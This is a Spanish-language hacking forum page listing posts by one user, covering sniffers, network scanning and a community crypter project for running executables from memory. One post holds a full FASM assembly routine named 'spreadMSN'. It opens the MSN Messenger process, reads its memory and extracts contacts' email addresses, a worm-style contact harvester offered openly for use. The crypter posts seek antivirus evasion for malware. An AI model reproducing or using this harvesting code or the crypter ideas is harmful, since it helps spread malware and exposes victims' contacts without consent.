Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - c4st0r

#11
si a mi me interesa mucho eso tambien , me quede en el scanner de la red. Pero se que existen esas apis, tienen un nombre parecido a netbios.... una vez lo vi en la msdn y por otro lado pero no la volvi a encontrar.

Bueno modifico esto y os pongo este link que esta un poco mas abajo donde se habla de ello :S

http://foro.elhacker.net/programacion_vb/listar_los_recursos_compartidos_de_un_equipo_remoto-t242132.0.html
#12
Bueno el titulo lo dice todo, como puedo conseguir la ip de un pc remoto teniendo el handle del socket, no quiero algo que tenga que ver con el ocx de vb, gracias
#13
ASM / ASM y MSN
23 Marzo 2009, 14:04 PM
Hola muy buenas a todos, a ver si algunos de ustedes me podian sugerir como podemos controlar el MSn desde el fasm asi como lo hace C con una libreria, si tengo que hacerme una libreria o si se les ocurre alguna otra manera. Yo he logrado sacar los contactos abriendo el proceso del Messenger y leyendo en todos sus bloques de memoria extrayendolos pero se demora bastante. Aqui les dejor lo que hice, siento mucho que el code no este comentado y que sea tan lioso ya que no me gusta usar estructuras. Esta probado en el MSN live y funciona, en otras versiones no  :P


;####################################
;#                                  #
;#         Made by c4st0r xD        #
;#                                  #
;####################################

format PE GUI 4.0
include 'win32a.inc'
include 'macro/if.inc'
;MEMORY_BASIC_INFORMATION ' 28 bytes
;    BaseAddress As Long
;    AllocationBase As Long
;    AllocationProtect As Long
;    RegionSize As Long
;    State As Long
;    Protect As Long
;    lType As Long

;SYSTEM_INFO ' 36 Bytes
;    dwOemID As Long
;    dwPageSize As Long
;    lpMinimumApplicationAddress As Long
;    lpMaximumApplicationAddress As Long
;    dwActiveProcessorMask As Long
;    dwNumberOrfProcessors As Long
;    dwProcessorType As Long
;    dwAllocationGranularity As Long
;    wProcessorLevel As Integer
;    wProcessorRevision As Integer

spreadMSN:
invoke LocalAlloc, LPTR, 7500 ; memoria suficiente para las 3 estructuras y los correos
; SYSTEM_INFO   MEMORY_BASIC_INFORMATION + struct de CreateTool...
mov dword[eax], 296
mov ebx, eax
invoke CreateToolhelp32Snapshot, 15, 0; TH32CS_SNAPALL
mov esi, eax
mov edi, ebx
add edi, 36
bucle:
invoke Process32Next, esi, ebx
cmp eax, 0
je @next
invoke lstrstr, edi, msnmsgr
cmp eax, 0
je bucle
invoke CloseHandle, esi
invoke OpenProcess, PROCESS_ALL_ACCESS, FALSE, dword[ebx+8]
mov edi, eax  ;   edi handle del proceso abierto
invoke GetSystemInfo, ebx ;SYSTEM_INFO
ScanMemory:
mov ecx, dword[ebx+12]
.while dword[ebx+8] < ecx
; si.lpMinimumApplicationAddress < si.lpMaximumApplicationAddress
   mov dword[ebx+36+12], 0
   mov esi, ebx
   add esi, 36
   invoke VirtualQueryEx, edi, dword[ebx+8], esi, 28
   .if eax = 28
       .if dword[ebx+36+24] = MEM_PRIVATE | dword[ebx+36+16] = MEM_COMMIT
   .if dword[ebx+36+12] > 0
       invoke LocalAlloc, LPTR, dword[ebx+36+12]
       mov esi, eax
       invoke ReadProcessMemory, edi, dword[ebx+36], esi, dword[ebx+36+12], 0
       .if eax <> 0
   mov ecx, dword[ebx+36+12]
   mov edx, esi
   .while ecx <> 0
       .if dword[edx] = '|Pas'
       .if dword[edx+4] = 'spor'
       .if word[edx+8] = 't|'
   add edx, 10
   mov al, '('
   mov cl, 50
   pushad
   mov edi, edx
   repne scasb
   mov byte[edi-1], 0
   xor eax, eax
   mov al, 50
   sub al, cl
   mov esi, eax
   dec esi
   mov edi, ebx
   add edi, 36+28
   mov ebx, edx
   invoke lstrstr, edi, edx
   .if eax <> 0
       jmp NotCopy
   .endif
   mov al, 0
   mov ecx, -1
   repne scasb
   dec edi
   invoke RtlMoveMemory, edi, ebx, esi
   add edi, esi
   mov word[edi], 0x0A0D
   NotCopy:
   popad
       .endif
       .endif
       .endif
       inc edx
       dec ecx
   .endw
       .endif
       invoke LocalFree, esi
   .endif
       .endif
   .endif
   mov ecx, dword[ebx+36]
   add ecx, dword[ebx+36+12]
   mov dword[ebx+8], ecx
   mov ecx, dword[ebx+12]
.endw
EndScan:
invoke CloseHandle, edi

    invoke ExitProcess, 0
@next:
invoke LocalFree, ebx
jmp spreadMSN

msnmsgr    db  'msnmsgr.exe', 0

#14
Buenas a todos, y donde podemos encontrar el codigo ese del crypter que decis que habeis hecho copy paste para echarle un vistazo?
#15
Muchas gracias por sus respuestas...

Tugshack procura no faltar al respeto, dos respuestas q has dado, dos veces q has faltado, procura no seguir en esta aptitud, creo q yo no he faltado a nadie.. esto no es para crear polemica pero nunca sabemos a quien podemos ofender de este modo gratuito y las consecuencias luego las pagamos todos...
#16
Algun manual de como hacemos los opcodes en asm, no entiendo porque tiene que ser asm, me he leido el tutorial de Hendrix con sus enlaces como diez veces y ya lo voy pillando, pero lo de hacer el codigo en Asm me ha dejado pillado, a ver si podeis seguir dando consejos...
#17
Bueno pues a buscarse la vida no queda otra...
#18
seria muy bueno hacer un proyecto entre todos de un crypter en vb y la modificacion de la cabecera para que se ejecute desde memoria
#19
Programación Visual Basic / Re: sniffer
7 Noviembre 2007, 18:56 PM
Lo estoy viendo y es buenisimo, para hacer que se filtre solo un puerto con filtrar el listview es suficiente jejeje, gracias
#20
Programación Visual Basic / Re: sniffer
7 Noviembre 2007, 15:09 PM
buenas a todos, me interesa muchisimo esto del sniffer a ver si me podeis pasar la ocx por favor, os estaria super agradecido, saludos...